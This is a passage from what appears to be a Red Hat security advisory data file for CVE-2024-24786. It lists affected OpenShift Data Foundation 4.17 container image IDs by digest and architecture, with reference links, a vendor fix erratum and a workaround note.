"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-24786", }, { category: "external", summary: "RHBZ#2268046", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2268046", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-24786", url: "https://www.cve.org/CVERecord?id=CVE-2024-24786", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-24786", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-24786", }, { category: "external", summary: "https://go.dev/cl/569356", url: "https://go.dev/cl/569356", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/ArQ6CDgtEjY/", url: "https://groups.google.com/g/golang-announce/c/ArQ6CDgtEjY/", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-2611", url: "https://pkg.go.dev/vuln/GO-2024-2611", }, ], release_date: "2024-03-05T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", 